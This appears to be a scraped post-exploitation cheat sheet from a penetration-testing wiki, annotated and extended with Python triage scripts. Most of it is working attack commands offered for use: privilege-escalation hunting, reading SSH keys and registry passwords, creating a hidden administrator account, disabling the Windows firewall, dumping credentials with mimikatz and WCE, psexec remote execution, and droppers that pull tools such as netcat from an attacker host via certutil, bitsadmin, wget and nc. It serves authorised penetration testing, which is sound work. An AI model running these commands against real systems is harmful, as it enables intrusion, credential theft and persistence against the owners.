created: 2022-04-19T19:48:56 (UTC +08:00)
tags: []
source: https://pentestwiki.org/post-exploitation/
author:

✅ Intro to Post Exploitation - pentestwiki.org

Excerpt

Learn about post exploitation tactics in Windows and Linux, how to exfiltrate information, information gathering, password dumping, …


  • Check for weak permissions (Linux):

Find setuid binaries (a setuid-root binary that is writable, outdated or has a known shell escape is a direct path to root; the setgid equivalent is -perm -2000):

  find / -perm -4000 -ls 2>/dev/null

Find world-writable files (pruning /proc and /sys, which are pseudo-filesystems full of false positives):

  find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls 2>/dev/null

Find world-writable directories (a world-writable directory without the sticky bit, unlike /tmp, lets any user replace files that other users or root-owned jobs drop there):

  find / -path /sys -prune -o -path /proc -prune -o -type d -perm -o=w -ls 2>/dev/null

Look for interesting files (configuration, logs and notes frequently contain credentials):

  find / -name "*.txt" -ls 2>/dev/null
  find / -name "*.log" -ls 2>/dev/null

Check sudo (run sudo -l first: it lists what the current user may run and whether a password is needed; sudo su only works when a root shell or ALL is permitted):

  sudo -l
  sudo su

Inspect PKCS#12 bundles (.p12/.pfx files hold a private key plus its certificate chain; openssl prompts for the import password, which is often empty or trivial):

  openssl pkcs12 -info -in $FILE

Show certificates in a PKCS#7 file and verify S/MIME signatures (the smime -verify calls check the signer against the system CA store; -noverify only confirms the signature is internally consistent):

  openssl pkcs7 -print_certs -inform DER -in $FILE
  openssl smime -verify -in signed.p7 -inform pem
  openssl smime -verify -in signed.p7 -inform der

Show Java keystore content (keytool prompts for the store password; the JDK's own cacerts store ships with the default changeit; PrivateKeyEntry entries are the ones worth extracting):

  keytool -list -v -keystore keystore.jks

  • Commands for information gathering:

Processes, mounts and network configuration (ifconfig, route and netstat belong to net-tools, which many current distributions no longer install; the iproute2 equivalents are ip addr, ip route and ss -tanup):

  ps -ef
  mount
  /sbin/ifconfig -a
  route -n
  netstat -tanu

Scheduled jobs (a writable script run by a root cron job is a common privilege-escalation path):

  cat /etc/crontab
  ls -la /var/spool/cron*/
  ls -la /etc/cron.d

NFS exports (look for no_root_squash):

  cat /etc/exports

Distribution and version:

  cat /etc/redhat* /etc/debian* /etc/*release

Find users with shell access (grep -E is the current spelling of egrep; this pattern only matches /bin/sh and /bin/bash, so accounts using zsh, dash, fish or shells under /usr/bin are missed; compare against /etc/shells for a complete list):

  egrep -e '/bin/(ba)?sh' /etc/passwd

Check bootup services (SysV init; on systemd hosts the unit files live under /etc/systemd/system):

  ls /etc/rc*

SSH relationships and logins (authorized_keys shows who can log in here, known_hosts shows where this user has connected, and any private key found may be reused against those hosts):

  cat ~/.ssh/*
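The Linux checks above, reimplemented in Python as an added example so the logic can be read and extended; this is not code from pentestwiki.org. It generalizes the shell-user grep by checking login shells against /etc/shells instead of a fixed regex, and reports whether each world-writable directory has the sticky bit. The file tree and passwd/shells data are constructed inside the block; on a real host you would call find_suid('/') and feed it the real /etc/passwd and /etc/shells.

```python
import os
import stat
import tempfile

PRUNE = ("/proc", "/sys")   # pseudo-filesystems, skipped like the -prune clauses above


def walk_entries(root):
    """Yield (path, lstat) for every entry under root, skipping pruned trees."""
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in PRUNE]
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                yield path, os.lstat(path)
            except OSError:
                continue          # unreadable entry, the equivalent of 2>/dev/null


def find_suid(root):
    """Regular files with the setuid bit set (find / -perm -4000 -type f)."""
    return sorted(p for p, st in walk_entries(root)
                  if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID)


def find_world_writable(root, directories=False):
    """World-writable files, or directories when directories=True (find -perm -o=w).

    Each hit is (path, sticky): a world-writable directory with the sticky bit,
    such as /tmp, only lets users delete their own files, so it is far less
    useful to an attacker than one without it.
    """
    hits = []
    for p, st in walk_entries(root):
        if stat.S_ISLNK(st.st_mode) or not st.st_mode & stat.S_IWOTH:
            continue
        if stat.S_ISDIR(st.st_mode) == directories:
            hits.append((p, bool(st.st_mode & stat.S_ISVTX)))
    return sorted(hits)


def shell_users(passwd_text, shells_text):
    """Accounts whose login shell is listed in /etc/shells and is not nologin/false.

    Generalizes egrep '/bin/(ba)?sh' /etc/passwd, which misses zsh, dash, fish
    and shells that live under /usr/bin.
    """
    shells = {s.strip() for s in shells_text.splitlines()
              if s.strip() and not s.startswith("#")
              and not s.strip().endswith(("nologin", "false"))}
    users = []
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) == 7 and f[6] in shells:
            users.append((f[0], int(f[2]), f[6]))
    return users


# Constructed sample data; not taken from a real host.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
backup:x:34:34:backup:/var/backups:/bin/false
alice:x:1000:1000:Alice:/home/alice:/usr/bin/zsh
bob:x:1001:1001:Bob:/home/bob:/bin/dash
svc:x:999:999::/opt/svc:/bin/sh
"""
SAMPLE_SHELLS = """# /etc/shells: valid login shells
/bin/sh
/bin/bash
/bin/dash
/usr/bin/zsh
/usr/sbin/nologin
"""


def _mkdir(path, mode=0o755):
    os.mkdir(path, mode)
    os.chmod(path, mode)          # explicit chmod so the umask cannot change the result
    return path


def _touch(path, mode):
    open(path, "w").close()
    os.chmod(path, mode)
    return path


def demo():
    """Build a throwaway tree (setuid file, world-writable file, sticky tmp dir)
    and run the checks over it, returning paths relative to the tree."""
    with tempfile.TemporaryDirectory() as root:
        usr_bin = _mkdir(os.path.join(_mkdir(os.path.join(root, "usr")), "bin"))
        _touch(os.path.join(usr_bin, "passwd"), 0o4755)
        _touch(os.path.join(_mkdir(os.path.join(root, "etc")), "app.conf"), 0o666)
        _mkdir(os.path.join(root, "tmp"), 0o1777)
        rel = lambda p: os.path.relpath(p, root)
        return {
            "suid": [rel(p) for p in find_suid(root)],
            "ww_files": [rel(p) for p, _ in find_world_writable(root)],
            "ww_dirs": [(rel(p), sticky) for p, sticky in find_world_writable(root, True)],
        }


if __name__ == "__main__":
    print(demo())
    for name, uid, shell in shell_users(SAMPLE_PASSWD, SAMPLE_SHELLS):
        print(f"{name:<10} uid={uid:<6} {shell}")
```

The sticky flag matters when triaging world-writable directories: /tmp-style directories show up in the raw find output but are rarely exploitable, whereas an unsticky world-writable directory on a root cron job's path is.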

Windows Post-exploitation

Check filesystem:

Show hidden entries (dir /A:H lists only hidden items; dir /A lists everything including hidden and system files, which is the closer equivalent of ls -la):

  dir /A:H

List files by extension across the drive (findstr is case-sensitive unless /I is given, so .TXT files are missed without it; /E anchors the match at the end of the line):

  dir /s /b C:\ | findstr /E ".txt" > txt.txt
  dir /s /b C:\ | findstr /E ".log" > log.txt
  dir /s /b C:\ | findstr /E ".doc" > doc.txt
  dir /s /b C:\ | findstr /E ".xls" > xls.txt
  dir /s /b C:\ | findstr /E ".xml" > xml.txt

Compute an MD5 hash (PowerShell; MD5 is enough to spot a truncated or wrong file, not to prove integrity against an adversary, which is why Get-FileHash defaults to SHA256):

  Get-FileHash -Algorithm MD5 -Path .\$FILE

Check registry (the two recursive searches are slow but turn up stored service and application passwords; AlwaysInstallElevated only gives privilege escalation when the value is 1 in BOTH HKLM and HKCU, in which case any .msi a user runs installs as SYSTEM):

  reg query HKLM /f password /t REG_SZ /s > hklm_password.txt
  reg query HKCU /f password /t REG_SZ /s > hkcu_password.txt
  reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated > reg_always.txt
  reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated >> reg_always.txt

Check scheduled tasks and running processes (tasklist /SVC maps each service to the process hosting it):

  schtasks /query /fo LIST /v > schtasks.txt
  tasklist /SVC > tasklist.txt

Other checks (DRIVERQUERY lists loaded drivers; the wmic line really reboots the host, so run it only when a reboot is intended):

  DRIVERQUERY
  wmic os where Primary='TRUE' reboot

List hotfixes (compare the installed KBs against the OS build to find missing patches):

  wmic qfe

Miscellaneous (notepad myfile.txt:lion.txt opens the NTFS alternate data stream lion.txt attached to myfile.txt, a classic hiding place that dir does not show; eventvwr.exe opens the Event Viewer GUI; quser shows logged-on sessions, including RDP; netsh firewall is the pre-Vista syntax, see the advfirewall commands below; icacls on a service binary shows whether a low-privileged user can overwrite it):

  notepad myfile.txt:lion.txt
  eventvwr.exe
  quser > rdp.txt
  netstat -an > netstat.txt
  netsh firewall show config > firewall.txt
  icacls service.exe
  type C:\Windows\System32\drivers\etc\hosts

Wmic commands (wmic is deprecated in current Windows releases, where the same queries run through PowerShell's Get-CimInstance; /node: targets a remote host; in the service listing, an unquoted pathname containing spaces is a hijack candidate if a parent directory is writable):

  wmic service get name,displayname,pathname,startmode > wmic_service.txt
  wmic /node:'' qfe GET description,FixComments,hotfixid,installedby,installedon,servicepackineffect
  wmic /node:"" product get name,version,vendor
  wmic process get Caption,CommandLine
  wmic printer list status
  wmic cpu get

List SIDs of the system (as admin):

  wmic useraccount get name,sid,fullname
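An added example (not from pentestwiki.org) that turns two of the checks above into parsers over saved command output: the AlwaysInstallElevated rule from the registry section (both HKLM and HKCU must be REG_DWORD 1) applied to reg query output, and detection of unquoted service paths with spaces applied to the wmic service listing. It assumes the service listing was captured with wmic's /format:csv switch, which the command above does not use; all input below is constructed.

```python
import re

# AlwaysInstallElevated only yields SYSTEM-level MSI installs when BOTH hives are 1.
AIE_KEYS = (
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer",
    r"HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer",
)
# Executable part of a service command line: up to the first .exe/.bat/.cmd/.com
# that is followed by whitespace or the end of the string.
EXE_RE = re.compile(r"^(.*?\.(?:exe|bat|cmd|com))(?=\s|$)", re.IGNORECASE)


def parse_reg_query(output):
    """Map 'KEY\\ValueName' -> (type, data) from the text reg query prints.

    Key lines start at column 0; value lines are indented and hold name, type
    and data separated by runs of spaces (data may itself contain spaces)."""
    values, key = {}, None
    for line in output.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():
            key = line.strip()
            continue
        parts = line.split()
        if key and len(parts) >= 3 and parts[1].startswith("REG_"):
            values[key + "\\" + parts[0]] = (parts[1], " ".join(parts[2:]))
    return values


def _dword(data):
    try:
        return int(data, 16)          # reg query prints REG_DWORD data as 0x...
    except ValueError:
        return None


def always_install_elevated(hklm_output, hkcu_output):
    """True only if the policy is REG_DWORD 1 in both HKLM and HKCU."""
    vals = {**parse_reg_query(hklm_output), **parse_reg_query(hkcu_output)}
    for key in AIE_KEYS:
        typ, data = vals.get(key + "\\AlwaysInstallElevated", ("", ""))
        if typ != "REG_DWORD" or _dword(data) != 1:
            return False
    return True


def unquoted_service_paths(csv_output, skip_prefix="c:\\windows\\"):
    """Services whose binary path is unquoted and contains a space.

    Windows tries C:\\Program.exe, then 'C:\\Program Files\\Bad.exe', and so on
    before reaching the real binary, so a writable parent directory lets a
    local user plant one of those and have the service run it (usually as
    SYSTEM). Paths under C:\\Windows are skipped: ordinary users cannot write
    there."""
    rows = [r for r in csv_output.splitlines() if r.strip()]
    if not rows:
        return []
    header = [h.strip().lower() for h in rows[0].split(",")]
    col = {name: i for i, name in enumerate(header)}
    findings = []
    for row in rows[1:]:
        cells = row.split(",")            # a PathName containing a comma would break this
        if len(cells) < len(header):
            continue
        path = cells[col["pathname"]].strip()
        if not path or path.startswith('"'):
            continue
        m = EXE_RE.match(path)
        exe = m.group(1) if m else path
        if " " not in exe or exe.lower().startswith(skip_prefix):
            continue
        findings.append({
            "service": cells[col["name"]],
            "startmode": cells[col["startmode"]],
            "path": path,
            # every prefix ending just before a space is a name Windows tries first
            "hijack_candidates": [exe[:i] + ".exe" for i, c in enumerate(exe) if c == " "],
        })
    return findings


# Constructed sample output; no real host was queried.
SAMPLE_HKLM = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

"""
SAMPLE_HKCU = r"""
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

"""
SAMPLE_HKCU_MISSING = "ERROR: The system was unable to find the specified registry key or value."

SAMPLE_WMIC_CSV = r"""Node,Name,PathName,StartMode
WS01,Spooler,C:\Windows\System32\spoolsv.exe,Auto
WS01,GoodSvc,"C:\Program Files\Good Vendor\good.exe" -service,Auto
WS01,BadSvc,C:\Program Files\Bad Vendor\bad.exe -k run,Auto
WS01,Shared,C:\Windows\system32\svchost.exe -k netsvcs,Manual
WS01,ManualBad,C:\Tools\Some Tool\tool.exe,Manual
"""

if __name__ == "__main__":
    print("AlwaysInstallElevated exploitable:",
          always_install_elevated(SAMPLE_HKLM, SAMPLE_HKCU))
    for f in unquoted_service_paths(SAMPLE_WMIC_CSV):
        print(f"{f['service']} ({f['startmode']}): {f['path']}")
        for c in f["hijack_candidates"]:
            print("    try planting:", c)
```

An unquoted path is only a finding once icacls confirms that one of the candidate locations is writable by the current user and the service can be restarted (or the host rebooted); services with StartMode Auto are the ones that pay off after a reboot.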

Net commands:

  net view
  net view \\host
  net share
  net use z: \\host\dir
  net users
  net user %username%
  net config rdr

Backdoor account (needs an administrative shell and is noisy: account creation and local group changes are logged as Security events 4720 and 4732, which most SIEM rule sets alert on):

  net user hax0r hax0r /add
  net localgroup administrators hax0r /add
  net localgroup "Remote Desktop Users" hax0r /add

Check routing/network information:

  route print
  arp -a
  ipconfig /all
  getmac

Show file attributes / permissions (cacls is deprecated; icacls replaces it):

  cacls cmd.exe
  attrib cmd.exe

List services (sc requires a space after each '='; net start lists only the services that are running):

  sc queryex type= service state= all
  net start

Other info:

  systeminfo
  whoami

Idem for Windows XP, which does not ship whoami:

  echo %USERNAME%
  • Firewall

Show status and configuration (netsh firewall is the legacy XP/2003 context; netsh advfirewall is the one to use on Vista and later) and add inbound allow rules for tunnelling tools:

  netsh firewall show stat
  netsh firewall show config
  netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
  netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
  netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
  netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079

Disable firewall (adding a single rule is far less conspicuous than switching the firewall off, which the Windows Security Center flags immediately):

  netsh advfirewall set currentprofile state off
  netsh advfirewall set allprofiles state off
  • RDP

Show RDP sessions and enable Remote Desktop (the registry key is "Terminal Server" with a space; fDenyTSConnections=0 allows connections; the service name is TermService and it runs inside svchost.exe -k termsvcs, which is how it appears in tasklist /svc; netsh firewall set service is legacy syntax, on current systems enable the "Remote Desktop" rule group with netsh advfirewall instead):

  quser
  qwinsta
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
  netsh firewall set service type=remotedesktop mode=enable
  net start termservice
  net start "Terminal Services"
  tasklist /svc /S servername /U username /P password

Change RDP daemon status from Meterpreter (more Meterpreter commands in Metasploit Meterpreter Cheat Sheet):

  meterpreter > reg queryval -k "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v TSEnabled
  meterpreter > reg setval -k "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v TSEnabled -d 1

Change RDP port (REG_DWORD PortNumber, default 3389; the built-in Remote Desktop firewall rule is tied to 3389, so a new port needs its own rule):

  HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber

Remote Execution commands (wmis is the Linux wmi-client; tasklist and taskkill filters use the "NAME op VALUE" syntax, so a process-name filter is written IMAGENAME eq norton*):

  wmis -U DOMAIN\$USER%$PASS //$DC cmd.exe /c $COMMAND
  wmic /node:$IP /user:administrator /password:$PASSWORD bios get serialnumber
  tasklist.exe /S $IP /U domain\username
  tasklist.exe /S $IP /U domain\username /FI "USERNAME eq NT AUTHORITY\SYSTEM" /FI "STATUS eq running"
  taskkill.exe /S $IP /U domain\username /F /FI "IMAGENAME eq norton*"
  quser /SERVER:$IP

From Sysinternals psexec (-s runs the command as SYSTEM; psexec copies PSEXESVC.exe to ADMIN$ and installs it as a service, which leaves a System event 7045 and is widely detected):

  psexec -accepteula \\$IP -u DOMAIN\USER cmd.exe
  psexec \\$IP -s cmd /c copy \\server\share\file.ext c:\Temp
  psexec -s \\$IP c:\windows\system32\cscript.exe script.vbs arg1

Copy a file to the target host AND execute it (-c copies the program, -w sets its working directory):

  psexec -accepteula \\$IP -u DOMAIN\USER -c file.exe -w C:\temp

Authenticated WMI Exec via Powershell (a local module: it runs from an existing session and uses that host's PowerShell to reach RHOSTS with the given credentials):

  msf > use exploit/windows/local/ps_wmi_exec
  msf exploit(windows/local/ps_wmi_exec) > show options

  Module options (exploit/windows/local/ps_wmi_exec):

    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    DOMAIN                     no        Domain or machine name
    PASSWORD                   no        Password to authenticate with
    RHOSTS                     no        Target address range or CIDR identifier
    SESSION                    yes       The session to run this module on.
    USERNAME                   no        Username to authenticate as

  Exploit target:

    Id  Name
    --  ----
    0   Universal

  msf exploit(windows/local/ps_wmi_exec) >

On the same host but as another user (runas prompts for the password and does not accept it on the command line; /netonly is the option for credentials that are only valid on the remote side):

  runas /user:administrator cmd
  runas /noprofile /user:DOMAIN\administrator cmd
  runas /profile /env /user:DOMAIN\$USER "%windir%\system32\script.bat"

Windows exploit suggester (OBSOLETE)

WARNING: As of March 14 2017 no longer supported (https://github.com/GDSSecurity/Windows-Exploit-Suggester/issues/28). It compares systeminfo output against Microsoft's security bulletin spreadsheet, which Microsoft stopped publishing in 2017, so it knows nothing about later patches.

  python windows-exploit-suggester.py --update
  python windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt

Tools for information gathering

Manual method (recent documents, favourites and the hosts file show what the user works with and any hard-coded name overrides):

  dir %TMP% %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent
  dir %USERPROFILE%\Favorites
  type C:\Windows\System32\drivers\etc\hosts

LaZagne

Download LaZagne from https://github.com/AlessandroZ/LaZagne (recovers stored credentials from browsers, mail clients, Wi-Fi profiles and other software; the binary is flagged by most AV):

  laZagne.exe all
  laZagne.exe browsers
  laZagne.exe browsers -firefox

  • Pupy https://github.com/n1nj4sec/pupy: open-source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in Python

Sniffers

Sniffers for Windows

Install Wireshark, or use dumpcap from the console (-D lists interfaces, -i captures on one; capturing needs the Npcap/WinPcap driver and usually administrator rights):

  dumpcap -D
  dumpcap -i $IFACE

Keyloggers for Windows

Windows keylogger (no admin rights):

To cross-compile it for Windows (MinGW-w64; -static avoids depending on the MinGW runtime DLLs on the target):

  i686-w64-mingw32-g++ klog_main.cpp -o klog -static

Network sniffers for Linux

Capture full packets (-s 0) and print them in hex and ASCII (-X):

  tcpdump -X -s 0 -i $INTERFACE

Password dumping

mimikatz (privilege::debug needs SeDebugPrivilege, i.e. an administrative shell; sekurlsa reads credentials out of LSASS memory and fails when LSA Protection (RunAsPPL) or Credential Guard is enabled):

  mimikatz.exe
  mimikatz> privilege::debug
  mimikatz> sekurlsa::logonPasswords
  mimikatz> sekurlsa::msv

Fgdump

Dumps hashes (needs SYSTEM privileges):

  fgdump.exe

WCE (Windows Credential Editor)

Dumps clear-text passwords:

  wce -w

Dumps hashes:

  wce

Persistent mode, writes to credentials.txt:

  wce -r

Change your credentials in memory (pass-the-hash; no clear-text password needed):

  wce -s

Droppers

Droppers, in the sense used here, are the ways of getting tools, trojans and other files onto the target machine so the compromise can continue locally.

Droppers using Linux (curl -k skips TLS certificate validation; a raw nc transfer has no integrity check, so compare a hash afterwards):

  wget http://$IP/file
  curl -k https://$IP/file > file
  nc -nvv $IP 8080 > file
  scp $FILE root@$IP:~

Droppers using Windows

Powershell (curl is an alias of Invoke-WebRequest in Windows PowerShell; add -OutFile to save the response to disk):

  curl -Uri $URL

See also Powercat in the Powershell frameworks section.

ROBOCOPY (authenticate to the host through IPC$ first, mirror the share, then drop the session):

  NET USE \\$IP\IPC$ /USER:DOMAIN\USER
  ROBOCOPY \\$IP\DATA\ C:\DATA\ /NP /TEE /E /dcopy:T /Z
  NET USE \\$IP\IPC$ /D

BITSAdmin

https://docs.microsoft.com/en-us/windows/desktop/Bits/bitsadmin-tool (deprecated in favour of the PowerShell BitsTransfer module, but still present)

Direct transfer:

  bitsadmin /transfer myDownloadJob /download /priority normal http://$IP/$FILE c:\$FILE

Using a download queue (a queued job does not start until bitsadmin /resume, and the file is only written out by bitsadmin /complete):

  bitsadmin /create myDownloadJob
  bitsadmin /addfile myDownloadJob http://$IP/$FILE c:\$FILE

Certutil (also leaves a copy of the download in the local URL cache):

  certutil.exe -urlcache -split -f "https://$IP/files/netcat.exe" nc.exe

Notepad (accepts a URL and downloads the file before opening it):

  notepad.exe http://$IP/file.txt

Living Off the Land (LOLbins) for Windows

Examples (signed Microsoft binaries that execute or compile code and rarely trip application allow-lists; hh.exe is the HTML Help viewer):

  hh.exe C:\windows\system32\calc.exe

C# compiler built-in command (ships with the .NET Framework, so C# source can be compiled on the target instead of dropping a binary):

  csc.exe

Droppers Using known protocols

All of these serve whatever is in the directory to anyone who can reach the port, with no authentication, so stage only what is needed and stop them afterwards.

HTTP

Python2 (serves the current directory on port 8000 by default; binding port 80 needs root):

  python -m SimpleHTTPServer
  python -m SimpleHTTPServer 80

Python3

  python3 -m http.server 8080

Php (binding to localhost only serves local clients; use 0.0.0.0:8000 to reach a target over the network):

  php -S localhost:8000

Ruby

  ruby -run -e httpd . -p 8000

FTP (pyftpdlib serves the current directory anonymously on port 2121 by default):

  pip install pyftpdlib
  python -m pyftpdlib

SMB (shares /root/payload as PAYLOADS; current Windows clients need -smb2support, and the share is unauthenticated unless -username/-password are given):

  impacket-smbserver PAYLOADS /root/payload
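An added example, not code from pentestwiki.org: Python's http.server (the module behind the python3 -m http.server one-liner above) started programmatically on 127.0.0.1 with an ephemeral port, a download through urllib, and a SHA-256 comparison on the receiving side, which is the step the page's Get-FileHash command performs by hand. It adds the integrity check the page only implies; raw nc, certutil and bitsadmin transfers give no such guarantee. The payload bytes are constructed and nothing leaves the loopback interface.

```python
import functools
import hashlib
import http.server
import os
import tempfile
import threading
import urllib.request

# Constructed stand-in for a tool binary; any bytes would do.
PAYLOAD = b"MZ" + bytes(range(256)) * 4


def digest(data, algo="sha256"):
    """Hex digest of data; SHA-256 by default, MD5 only for comparison with Get-FileHash."""
    return hashlib.new(algo, data).hexdigest()


class _QuietHandler(http.server.SimpleHTTPRequestHandler):
    def log_message(self, *args):   # silence per-request logging in the demo
        pass


def serve_directory(directory):
    """Serve directory over HTTP on a free loopback port; return (server, base_url)."""
    handler = functools.partial(_QuietHandler, directory=directory)
    server = http.server.ThreadingHTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    host, port = server.server_address
    return server, f"http://{host}:{port}"


def fetch(url, expected_sha256, timeout=5):
    """Download url and report whether it matches the digest the sender published."""
    # Empty ProxyHandler: ignore any proxy environment so loopback is reached directly.
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    with opener.open(url, timeout=timeout) as resp:
        data = resp.read()
    got = digest(data)
    return {"ok": got == expected_sha256, "sha256": got, "bytes": len(data), "data": data}


def stage_and_verify(payload=PAYLOAD, name="tool.bin"):
    """Write payload into a temporary web root, serve it, fetch it back and verify it."""
    expected = digest(payload)
    with tempfile.TemporaryDirectory() as www:
        with open(os.path.join(www, name), "wb") as f:
            f.write(payload)
        server, base = serve_directory(www)
        try:
            good = fetch(f"{base}/{name}", expected)
            # Simulate a tampered transfer: the receiver holds the digest of a
            # different file, so this download must be rejected.
            tampered = fetch(f"{base}/{name}", digest(payload + b"\x00"))
        finally:
            server.shutdown()
            server.server_close()
    return {
        "ok": good["ok"],
        "bytes": good["bytes"],
        "sha256": good["sha256"],
        "md5": digest(good["data"], "md5"),
        "tamper_detected": not tampered["ok"],
    }


if __name__ == "__main__":
    r = stage_and_verify()
    print(f"{r['bytes']} bytes, sha256={r['sha256']}, ok={r['ok']}, "
          f"tamper detected={r['tamper_detected']}")
```

In the field the sender records the SHA-256 before serving and the receiver recomputes it after the transfer (Get-FileHash on Windows, sha256sum on Linux); a mismatch means a truncated download or a hostile proxy, and the file should not be executed.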

As part of post-exploitation we can also perform data exfiltration.